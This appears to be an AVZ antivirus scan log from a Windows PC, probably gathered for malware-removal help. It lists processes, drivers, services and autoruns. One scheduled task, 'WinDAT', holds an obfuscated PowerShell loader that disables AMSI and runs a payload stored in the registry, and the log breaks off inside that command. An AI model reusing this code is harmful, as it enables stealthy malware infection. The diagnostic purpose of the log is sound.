AVZ 5.55 http://z-oleg.com/secur/avz/
| Имя файла | PID | Описание | Copyright | MD5 | Информация
| c:\users\vladhpvlad\downloads\autologger\autologger.exe | Скрипт: Kарантин, Удалить, Удалить через BC, Завершить 11884 | Автоматический сборщик логов | Все права на AutoLogger принадлежат regist & Drongo © Copyright 2013 - 2021 | 772A7C082C9DE53CE7A1530B46AF8D2C | 16137,69 кб, rsAh,создан: 05.11.2021 15:37:18,изменен: 05.11.2021 06:40:07 | Командная строка: "C:\Users\VladHpVlad\Downloads\AutoLogger\AutoLogger.exe" c:\users\vladhpvlad\downloads\autologger\autologger\av\av_z.exe | Скрипт: Kарантин, Удалить, Удалить через BC, Завершить 12556 | D554DC29059464AA4E4899680B84994D | 1564,00 кб, rsAh,создан: 05.11.2021 15:37:18,изменен: 05.11.2021 06:30:04 | Командная строка: "C:\Users\VladHpVlad\Downloads\AutoLogger\AutoLogger\AV\AV_Z.exe" Script=AV\GeneralScript.txt HiddenMode=0 c:\program files (x86)\no-ip\ducservice.exe | Скрипт: Kарантин, Удалить, Удалить через BC, Завершить 8964 | ducservice | Copyright © 2012 | 5A38F3BAD50558F0E09D696ACF612D9E | 12,00 кб, rsAh,создан: 20.07.2015 18:34:14,изменен: 20.07.2015 18:34:14 | Командная строка: "C:\Program Files (x86)\No-IP\ducservice.exe" c:\program files\windowsapps\microsoft.windows.photos_2021.21090.10008.0_x64__8wekyb3d8bbwe\microsoft.photos.exe | Скрипт: Kарантин, Удалить, Удалить через BC, Завершить 11184 | 8044B568747388B47D366A6CCE6198C2 | 738,50 кб, rsAh,создан: 05.11.2021 13:43:29,изменен: 05.11.2021 13:43:42 | Командная строка: c:\program files\red giant\services\red giant service.exe | Скрипт: Kарантин, Удалить, Удалить через BC, Завершить 4308 | Red Giant Service | Copyright (C) 2020 Red Giant LLC | 0208A08B339153BCE83872E755AC82C2 | 8358,59 кб, rsAh,создан: 24.07.2021 12:01:23,изменен: 24.07.2021 12:01:22 | Командная строка: Registry.exe | Скрипт: Kарантин, Удалить, Удалить через BC, Завершить 108 | X | ошибка получения информации о файле | Командная строка: Обнаружено:178, из них опознаны как безопасные 173
| | |||||||||||
| Имя модуля | Handle | Описание | Copyright | Информация | Используется процессами
| C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\fdc15310ba8d6d8ee412fbd7cfcb17e7\System.Configuration.ni.dll | Скрипт: Kарантин, Удалить, Удалить через BC 1554513920 | System.Configuration.dll | © Microsoft Corporation. All rights reserved. | MD5=367A99CD338663724909F56D1DD408DA | 958,00 кб, rsAh, создан: 03.11.2020 16:57:28, изменен: 03.11.2020 16:57:28 8964
| C:\Windows\assembly\NativeImages_v2.0.50727_32\System.ServiceProce#\d1fe77b59f5254afa353e126f55339bb\System.ServiceProcess.ni.dll | Скрипт: Kарантин, Удалить, Удалить через BC 1561067520 | .NET Framework | © Microsoft Corporation. All rights reserved. | MD5=548729688451848B6A22541F7C5CDF0B | 219,00 кб, rsAh, создан: 03.11.2020 16:57:30, изменен: 03.11.2020 16:57:30 8964
| C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\78c2a2d668d3c1896534063b52a93918\System.Xml.ni.dll | Скрипт: Kарантин, Удалить, Удалить через BC 1555562496 | .NET Framework | © Microsoft Corporation. All rights reserved. | MD5=9A3EF7F0F76E451933D3CAAD542FD507 | 5343,50 кб, rsAh, создан: 02.11.2020 22:02:59, изменен: 02.11.2020 22:02:59 8964
| C:\Windows\assembly\NativeImages_v2.0.50727_32\System\06e54f5fa1f15dd558eaf403cdcacad3\System.ni.dll | Скрипт: Kарантин, Удалить, Удалить через BC 1561329664 | .NET Framework | © Microsoft Corporation. All rights reserved. | MD5=51CD9934353B29406AAA3E322CB5BAA8 | 7825,00 кб, rsAh, создан: 02.11.2020 22:02:28, изменен: 02.11.2020 22:02:28 8964
| Обнаружено модулей:211, из них опознаны как безопасные 207
| | |||||
| Модуль | Редиректор | Базовый адрес | Размер в памяти | Описание | Производитель
| C:\Windows\System32\Drivers\dump_diskdump.sys | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | 49440000 | 0000E000 (57344) | |
| C:\Windows\System32\drivers\dump_storahci.sys | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | 49490000 | 00032000 (204800) | |
| C:\Windows\System32\Drivers\dump_dumpfve.sys | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | 494F0000 | 0001D000 (118784) | |
| C:\Windows\system32\Drivers\PROCEXP152.SYS | 35,36 кб, rsAh, создан: 31.10.2021 10:03:08, изменен: 05.11.2021 12:12:31 Скрипт: Kарантин, Удалить, Удалить через BC x64 | 2A920000 | 0000C000 (49152) | Process Explorer | Copyright (C) Mark Russinovich 1996-2021
| Обнаружено элементов - 203, опознано как безопасные - 199
| | |||||
| Служба | Описание | Статус | Имя файла | Редиректор | Описание | Производитель | Группа | Зависимости
| EpicOnlineServices | Служба: Стоп, Удалить, Отключить, Удалить через BC Epic Online Services | Не запущен | C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe | 15653,78 кб, rsAh, создан: 05.01.2021 13:24:34, изменен: 30.10.2021 19:43:02 Скрипт: Kарантин, Удалить, Удалить через BC x64 | Epic Online Services Host | Copyright (c) 2008-2021 Epic Games, Inc., Kohsuke Kawaguchi, Sun Microsystems, Inc., CloudBees, Inc., Oleg Nenashev and other contributors | |
| mracsvc | Служба: Стоп, Удалить, Отключить, Удалить через BC MRAC Service | Не запущен | C:\Windows\System32\mracsvc.exe | 21253,66 кб, rsAh, создан: 17.01.2021 15:31:27, изменен: 17.01.2021 15:31:27 Скрипт: Kарантин, Удалить, Удалить через BC x64 | Mail.Ru AntiCheat Service | Copyright (C) 2020 LLC Mail.Ru | |
| Origin Client Service | Служба: Стоп, Удалить, Отключить, Удалить через BC Origin Client Service | Не запущен | C:\Program Files (x86)\Origin\OriginClientService.exe | 2497,71 кб, rsAh, создан: 25.10.2021 09:01:19, изменен: 25.10.2021 09:00:55 Скрипт: Kарантин, Удалить, Удалить через BC x64 | OriginClientService | Copyright (C) 2012 | |
| Origin Web Helper Service | Служба: Стоп, Удалить, Отключить, Удалить через BC Origin Web Helper Service | Не запущен | C:\Program Files (x86)\Origin\OriginWebHelperService.exe | 3394,71 кб, rsAh, создан: 25.10.2021 09:01:19, изменен: 25.10.2021 09:00:55 Скрипт: Kарантин, Удалить, Удалить через BC x64 | OriginWebHelperService | Copyright (C) 2015 | |
| PnkBstrA | Служба: Стоп, Удалить, Отключить, Удалить через BC PnkBstrA | Работает | C:\Windows\system32\PnkBstrA.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | | | |
| PnkBstrB | Служба: Стоп, Удалить, Отключить, Удалить через BC PnkBstrB | Работает | C:\Windows\system32\PnkBstrB.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | | | |
| Red Giant Service | Служба: Стоп, Удалить, Отключить, Удалить через BC Red Giant Service | Работает | C:\Program Files\Red Giant\Services\Red Giant Service.exe | 8358,59 кб, rsAh, создан: 24.07.2021 12:01:23, изменен: 24.07.2021 12:01:22 Скрипт: Kарантин, Удалить, Удалить через BC x64 | Red Giant Service | Copyright (C) 2020 Red Giant LLC | |
| Rockstar Service | Служба: Стоп, Удалить, Отключить, Удалить через BC Rockstar Game Library Service | Не запущен | C:\Program Files\Rockstar Games\Launcher\RockstarService.exe | 1989,30 кб, rsAh, создан: 28.07.2021 17:22:16, изменен: 02.11.2021 20:21:04 Скрипт: Kарантин, Удалить, Удалить через BC x64 | Rockstar Games Launcher Service | Rockstar Games Inc. (C) 2005--2021 Take Two Interactive. All rights reserved | |
| vgc | Служба: Стоп, Удалить, Отключить, Удалить через BC vgc | Не запущен | C:\Program Files\Riot Vanguard\vgc.exe | 10080,45 кб, rsAh, создан: 28.06.2021 20:15:44, изменен: 21.05.2021 05:14:44 Скрипт: Kарантин, Удалить, Удалить через BC x64 | Vanguard user-mode service. | Copyright (C) 2021 | |
| Обнаружено элементов - 286, опознано как безопасные - 277
| | ||||||||
| Служба | Описание | Статус | Имя файла | Редиректор | Описание | Производитель | Группа | Зависимости
| FairplayKD | Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC FairplayKD | Не запущен | C:\ProgramData\NextRP\Common\temp\FairplayKD.sys | 69,27 кб, rsah, создан: 06.12.2020 19:31:54, изменен: 03.07.2021 10:30:34 Скрипт: Kарантин, Удалить, Удалить через BC x64 | Multi Theft Auto patch driver | (C) 2003 - 2015 Multi Theft Auto | |
| mracdrv | Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC MRAC Driver | Не запущен | C:\Windows\System32\drivers\mracdrv1.sys | 20508,13 кб, rsAh, создан: 17.01.2021 15:31:28, изменен: 17.01.2021 15:31:28 Скрипт: Kарантин, Удалить, Удалить через BC x64 | Mail.Ru AntiCheat Driver | Copyright (C) 2020 LLC Mail.Ru | |
| RzCommon | Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC Razer Control Service | Не запущен | C:\Windows\System32\drivers\RzCommon.sys | 53,35 кб, rsAh, создан: 07.07.2020 19:33:08, изменен: 30.03.2021 19:37:28 Скрипт: Kарантин, Удалить, Удалить через BC x64 | Razer Common Driver | Copyright © 2021 Razer Inc. All rights reserved | |
| RzDev_022a | Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC Razer 022a Service | Не запущен | C:\Windows\System32\drivers\RzDev_022a.sys | 52,89 кб, rsAh, создан: 24.08.2020 16:04:50, изменен: 24.08.2020 16:04:50 Скрипт: Kарантин, Удалить, Удалить через BC x64 | Razer Device Driver | Copyright © 2020 Razer Inc. All rights reserved | |
| vgk | Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC vgk | Не запущен | C:\Program Files\Riot Vanguard\vgk.sys | 7990,82 кб, rsAh, создан: 28.06.2021 20:15:44, изменен: 20.05.2021 22:25:04 Скрипт: Kарантин, Удалить, Удалить через BC x64 | Vanguard kernel-mode driver. | Copyright (C) 2021 | System Reserved |
| Обнаружено элементов - 395, опознано как безопасные - 390
| | ||||||||
| Имя файла | Редиректор | Метод запуска | Описание
| C:\Windows\System32\icardres.dll | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\CardSpace 4.0.0.0, EventMessageFile
| C:\Windows\System32\icardres.dll | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\CardSpace 4.0.0.0, CategoryMessageFile
| C:\Program Files\Common Files\Microsoft Shared\Ink\IPSEventLogMsg.dll | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Handwriting Recognition, EventMessageFile
| C:\Program Files\Common Files\Microsoft Shared\Ink\IPSEventLogMsg.dll | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Handwriting Recognition, CategoryMessageFile
| C:\Windows\System32\IusEventLog.dll | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Intel(R) Capability Licensing Service Interface, EventMessageFile
| d:\b01b96ab145169ec46\DW\DW20.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\VSSetup, EventMessageFile
| v4.0.30319\EventLogMessages.dll | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\VSTTAgentProcess, EventMessageFile
| C:\Windows\system32\eventlog.dll | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\VSTTExecution, EventMessageFile
| C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\msedge.dll | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft Edge Etw, EventMessageFile
| C:\Windows\System32\Drivers\UMDF\UsbccidDriver.dll | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-USB-CCID, EventMessageFile
| C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ярлык в папке автозагрузки | C:\Users\VladHpVlad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\VladHpVlad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk,
| C:\Program Files (x86)\Oracle\VirtualBox\VirtualBox.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ярлык в папке автозагрузки | C:\Users\VladHpVlad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\VladHpVlad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Oracle VM VirtualBox.lnk,
| C:\Program Files (x86)\Starus Recovery\Starus Partition Recovery 2.1\Starus Partition Recovery.exe | 6504,00 кб, rsAh, создан: 20.09.2013 16:03:32, изменен: 20.09.2013 16:03:32 Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ярлык в папке автозагрузки | C:\Users\VladHpVlad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\VladHpVlad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Starus Partition Recovery.lnk,
| C:\Users\VladHpVlad\AppData\Local\Discord\Update.exe | 1476,60 кб, rsAh, создан: 06.05.2021 10:19:16, изменен: 18.03.2021 13:22:10 Скрипт: Kарантин, Удалить, Удалить через BC x32 | Ключ реестра | HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Discord | Удалить Discord.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x32 | Ключ реестра | HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Discord | Удалить C:\Program Files (x86)\GOG Galaxy\GalaxyClient.exe | 14420,57 кб, rsAh, создан: 31.10.2020 21:05:44, изменен: 01.10.2020 21:26:02 Скрипт: Kарантин, Удалить, Удалить через BC x32 | Ключ реестра | HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, GogGalaxy | Удалить C:\Program Files\Stretchly\Stretchly.exe | 128119,50 кб, rsAh, создан: 19.07.2021 08:14:51, изменен: 04.05.2021 17:54:04 Скрипт: Kарантин, Удалить, Удалить через BC x32 | Ключ реестра | HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, net.hovancik.stretchly | Удалить C:\Windows\system32\bootim.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x32 | Ключ реестра | HKEY_LOCAL_MACHINE, System\CurrentControlSet\Control\Session Manager\, BootShell
| SshdPinAuthLsa.dll | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x32 | Ключ реестра | HKEY_LOCAL_MACHINE, System\CurrentControlSet\Control\Lsa, Authentication Packages
| C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x32 | Ключ реестра | HKEY_USERS, .DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run, Synapse3 | Удалить 3.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x32 | Ключ реестра | HKEY_USERS, .DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run, Synapse3 | Удалить C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x32 | Ключ реестра | HKEY_USERS, S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run, Synapse3 | Удалить 3.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x32 | Ключ реестра | HKEY_USERS, S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run, Synapse3 | Удалить C:\Program Files\Riot Vanguard\vgtray.exe | 550,93 кб, rsAh, создан: 28.06.2021 20:15:44, изменен: 21.05.2021 05:15:28 Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_LOCAL_MACHINE, Software\Microsoft\Windows\CurrentVersion\Run, Riot Vanguard | Удалить C:\Users\VladHpVlad\AppData\Local\Discord\Update.exe | 1476,60 кб, rsAh, создан: 06.05.2021 10:19:16, изменен: 18.03.2021 13:22:10 Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Discord | Удалить Discord.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Discord | Удалить C:\Program Files (x86)\GOG Galaxy\GalaxyClient.exe | 14420,57 кб, rsAh, создан: 31.10.2020 21:05:44, изменен: 01.10.2020 21:26:02 Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, GogGalaxy | Удалить C:\Program Files\Stretchly\Stretchly.exe | 128119,50 кб, rsAh, создан: 19.07.2021 08:14:51, изменен: 04.05.2021 17:54:04 Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, net.hovancik.stretchly | Удалить C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_USERS, .DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run, Synapse3 | Удалить 3.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_USERS, .DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run, Synapse3 | Удалить C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_USERS, S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run, Synapse3 | Удалить 3.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | Ключ реестра | HKEY_USERS, S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run, Synapse3 | Удалить Обнаружено элементов - 1110, опознано как безопасные - 1078
| | |||
| Имя файла | Редиректор | Тип | Описание | Производитель | CLSID
| Обнаружено элементов - 8, опознано как безопасные - 8
| | ||||||
| Имя файла | Редиректор | Назначение | Описание | Производитель | CLSID
| Обнаружено элементов - 82, опознано как безопасные - 82
| | ||||||
| Имя файла | Редиректор | Наименование | Тип | Описание | Производитель
| Обнаружено элементов - 10, опознано как безопасные - 10
| | |||||
| Имя файла | Редиректор | Имя задания | Описание | Производитель | Путь | Командная строка
| C:\Program Files (x86)\Microsoft Visual Studio\Installer.71c5cef6d7c74bcfaa64735fdd497e14\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | BackgroundDownload | Скрипт: Удалить задание планировщика | | C:\Windows\system32\Tasks\Microsoft\VisualStudio\Updates\ | C:\Program Files (x86)\Microsoft Visual Studio\Installer.71c5cef6d7c74bcfaa64735fdd497e14\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe
| powershell.exe -c "4609833558;$tBUn='5Syxst1emj.M_an_agnemwen4t.5Aubto2mautihonf.AzmsniUatislsk-abmspiIlni{tF7ai+le[d-5NoqnP.ubvli5c,=St)ateic' -replace('.widS(widS.widS.)'-replace'widS'),('$'+361/361);'r$txBU9n=_$t_BU0n t-s_pl)it!''-3'';c[R_efn].yAs)se6mbdlyv.G!ethTy?pe8($8tB6Un}[0_])l.G_et+Fi+el!d(i$t6BU_n[}1]u,$ztB_Un_[2q])t.Szet?Vaslu_e(_$n[ul5l,_(3[615-n+e6]64x))'-replace('.widS(widS.widS.)'-replace'widS'),('$'+361/361)|&('iviiveivx'-replace'iv');'q&(_gc_m (A*_-T/y*i).}Naymeb (g''yrusz_i8ntsg )xShy(1stvne4mi_;u)psdi3ang]_ ]Sy_ys}{t5eg3m.]_I_Ofj;uw_s9i._ngp7 iS_7ys_7t,e_tm./9R{u__nt_.ibm!!e.aoItn/ttei_r_o_6pSrbe_rurvi.-c,e[3s;}{ubs,5in[9g8 _9Mi__cir!_os/3o,f}7t.faW_icun3_e23;e_pug_b,lylicre hc_[lag8s]s+p e0}q_{6nde](lfe4)gadptte}( vdqo_i_ad rap7V_tD(i})5;k_pu_vb3lmdicu_ _s_ota_at_ig7c +hv.og0ido+ 7F_bLlgodt(_b){ckbyyuktes)[h]3_UY?!K!r77=F}-iyl[_e.__E.x0iis_rt_sc_(bk7oqq_/iy,_u!e1_rh__f8t_=wt_mbto_7qin_)_?_)Fi7el}ea1.Rmfe_am_dAj_l{l4lBy__tbefts(ocb]o,{qixcy4u7ser_lhufb[tw_{t9ba)oq)fio)b5:(q}b[yy2te{_[_]o_)Rige.gozis!5t8r?dy.s8L_osrca{vl_M3_ac9ch?i1_ne_0.3O_!pe.cn]S_puby_Kve?_y(cu@_b_foqw5i_S-qOFm_T_W9?AR_rEw\,[Mi8wc4r23os[_oyfyrt\eaC7TwoF\f.T_I.]Pb=0o}q__i)(4.,Gf{etc_V_a-]luy8e?()cbov1q_i__yu!je9r_7hf3_t9wp2tbsqo_q7{i,/eniu7dll,v)y;_nifuv(lU09YKp0rn=)(=n,wu!l2dl)mbr8e_]tu))r_ny3;ii_nnt[. G__nss95T=daU!Yw_Krv1.}Ll-en9wg_tb/h;-)f5o_3r(_{i_nm9t _wyoPo_xVyg=d0oq;yp4P7x_vV [_![=b_Gnwzs?Tk_-1!_;_y89PxwuVd+{.+)_t{=U!bYKebr_[_xyPl/x3V+_]^_!=_(!aby,wt3ebo)b)fofqbmiaei9!e.lpd_c(apz_FdceE0f97qF(t5bQ1v[??vdr0-]hnecs_Dt_q29.[aP77EPhp7rga=7jssd7}i_)B0xF2{x_CM_(Bao_mmmsaE}-_8gCcysh9_iyj{_.ezmnlc.o({r_tfxgob_j67l0_7c5b)eOM9_{a(_-_,__}h!a/yah8_4h_ai_tbJ_b45oq9ci+[_fyPlhx5V8qvE+wK_Z.+826+]s;u_}I_unvt0_Pt4}r_ jpnM]scd=c)(Io_n_ty=Ptq5r_)i_0;b]I!n=ttPj/t3rdj L-4jq=1_(Iw,njtg]Pt19r_)gzGnn.slT_m;NwbtjAaall./o+cu4at?tejV_tir1wtvuz4al_}M_e7smo_7r_y6{((loI{nz,tPt=t!rs5)(5_-d1_r),j}r7evif c_n,M5ec,j5(eIfuntkiPmt_vr)nc0k,5_reixf_ !]Lj_b,_08xx1!}0_0n_0,li03x(s40_q)t;c]Ma/pr_s}4ha]{lm.n9Co7_p,y[_(U_aYbK9hr,__0q,bknM?tcc,_=Gn+us_T[0);7_(_(utpV_/D.)anMas,r!s2xha_el{.c(Gen}thD6aelz_e1gmdaturedF_qorpmF1uv0ncn_t)il(on-_Pko_5ink}treq7r(_wnyM_cc,x}t_yrdpe_toqft_(p(_V_Du]))f3)a(6_);_m}k[v.Dl9el2I_ymp{_o7r_pt(-6b_oc_qit-notegdl[ul1b__oq]_i_)nt]p_{r=i-_va_gtce__ stbt_a!ati/ac= 8cex[8t_e{xrn_t klbvon{3gq 1=Nt1.Akl__loh_coa,8te_eV7i{irt[8u}as!lM?8eqm/sor47ys((9In0vt_P_dtr1_ gPx[Mgbh,_r_2efmm oI-unt2_P7t_5r _=hpe+)dI_a,[I_)ntc[P_t61r e)j)V__i,v=rwer[f wyIbnwitPayt-r+c y,cV_,,cUIivn.t_o32,a +T.,BJ_bhg,oeUI1}n_t!)32{_ ,Gp6Kjo?kj)fd;}_''-2re_pl[ac{e''_.(8..d)''n,''s$1a'' f-r?ep_la_ce_''bdoq_i''i,[8chear/](b343) _-r_epclahce_''v[EK]Z''3,[2chrarc](e37q))s;[lEn_vi_ro/nm4en}t]x::vCufrr(enatD/irwec_to]ry8=piwdh;[[eqc]:9:F_Ll_d([);'-replace('.NnOO(NnOO.NnOO.)'-replace'NnOO'),('$'+415/415)|&('DZmNiDZmNeDZmNx'-replace'DZmN');4750505109" | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | WinDAT | Скрипт: Удалить задание планировщика | | C:\Windows\system32\Tasks\Microsoft\Windows\Maintenance\ | powershell.exe -c "4609833558;$tBUn='5Syxst1emj.M_an_agnemwen4t.5Aubto2mautihonf.AzmsniUatislsk-abmspiIlni{tF7ai+le[d-5NoqnP.ubvli5c,=St)ateic' -replace('.widS(widS.widS.)'-replace'widS'),('$'+361/361);'r$txBU9n=_$t_BU0n t-s_pl)it!''-3'';c[R_efn].yAs)se6mbdlyv.G!ethTy?pe8($8tB6Un}[0_])l.G_et+Fi+el!d(i$t6BU_n[}1]u,$ztB_Un_[2q])t.Szet?Vaslu_e(_$n[ul5l,_(3[615-n+e6]64x))'-replace('.widS(widS.widS.)'-replace'widS'),('$'+361/361)|&('iviiveivx'-replace'iv');'q&(_gc_m (A*_-T/y*i).}Naymeb (g''yrusz_i8ntsg )xShy(1stvne4mi_;u)psdi3ang]_ ]Sy_ys}{t5eg3m.]_I_Ofj;uw_s9i._ngp7 iS_7ys_7t,e_tm./9R{u__nt_.ibm!!e.aoItn/ttei_r_o_6pSrbe_rurvi.-c,e[3s;}{ubs,5in[9g8 _9Mi__cir!_os/3o,f}7t.faW_icun3_e23;e_pug_b,lylicre hc_[lag8s]s+p e0}q_{6nde](lfe4)gadptte}( vdqo_i_ad rap7V_tD(i})5;k_pu_vb3lmdicu_ _s_ota_at_ig7c +hv.og0ido+ 7F_bLlgodt(_b){ckbyyuktes)[h]3_UY?!K!r77=F}-iyl[_e.__E.x0iis_rt_sc_(bk7oqq_/iy,_u!e1_rh__f8t_=wt_mbto_7qin_)_?_)Fi7el}ea1.Rmfe_am_dAj_l{l4lBy__tbefts(ocb]o,{qixcy4u7ser_lhufb[tw_{t9ba)oq)fio)b5:(q}b[yy2te{_[_]o_)Rige.gozis!5t8r?dy.s8L_osrca{vl_M3_ac9ch?i1_ne_0.3O_!pe.cn]S_puby_Kve?_y(cu@_b_foqw5i_S-qOFm_T_W9?AR_rEw\,[Mi8wc4r23os[_oyfyrt\eaC7TwoF\f.T_I.]Pb=0o}q__i)(4.,Gf{etc_V_a-]luy8e?()cbov1q_i__yu!je9r_7hf3_t9wp2tbsqo_q7{i,/eniu7dll,v)y;_nifuv(lU09YKp0rn=)(=n,wu!l2dl)mbr8e_]tu))r_ny3;ii_nnt[. G__nss95T=daU!Yw_Krv1.}Ll-en9wg_tb/h;-)f5o_3r(_{i_nm9t _wyoPo_xVyg=d0oq;yp4P7x_vV [_![=b_Gnwzs?Tk_-1!_;_y89PxwuVd+{.+)_t{=U!bYKebr_[_xyPl/x3V+_]^_!=_(!aby,wt3ebo)b)fofqbmiaei9!e.lpd_c(apz_FdceE0f97qF(t5bQ1v[??vdr0-]hnecs_Dt_q29.[aP77EPhp7rga=7jssd7}i_)B0xF2{x_CM_(Bao_mmmsaE}-_8gCcysh9_iyj{_.ezmnlc.o({r_tfxgob_j67l0_7c5b)eOM9_{a(_-_,__}h!a/yah8_4h_ai_tbJ_b45oq9ci+[_fyPlhx5V8qvE+wK_Z.+826+]s;u_}I_unvt0_Pt4}r_ jpnM]scd=c)(Io_n_ty=Ptq5r_)i_0;b]I!n=ttPj/t3rdj L-4jq=1_(Iw,njtg]Pt19r_)gzGnn.slT_m;NwbtjAaall./o+cu4at?tejV_tir1wtvuz4al_}M_e7smo_7r_y6{((loI{nz,tPt=t!rs5)(5_-d1_r),j}r7evif c_n,M5ec,j5(eIfuntkiPmt_vr)nc0k,5_reixf_ !]Lj_b,_08xx1!}0_0n_0,li03x(s40_q)t;c]Ma/pr_s}4ha]{lm.n9Co7_p,y[_(U_aYbK9hr,__0q,bknM?tcc,_=Gn+us_T[0);7_(_(utpV_/D.)anMas,r!s2xha_el{.c(Gen}thD6aelz_e1gmdaturedF_qorpmF1uv0ncn_t)il(on-_Pko_5ink}treq7r(_wnyM_cc,x}t_yrdpe_toqft_(p(_V_Du]))f3)a(6_);_m}k[v.Dl9el2I_ymp{_o7r_pt(-6b_oc_qit-notegdl[ul1b__oq]_i_)nt]p_{r=i-_va_gtce__ stbt_a!ati/ac= 8cex[8t_e{xrn_t klbvon{3gq 1=Nt1.Akl__loh_coa,8te_eV7i{irt[8u}as!lM?8eqm/sor47ys((9In0vt_P_dtr1_ gPx[Mgbh,_r_2efmm oI-unt2_P7t_5r _=hpe+)dI_a,[I_)ntc[P_t61r e)j)V__i,v=rwer[f 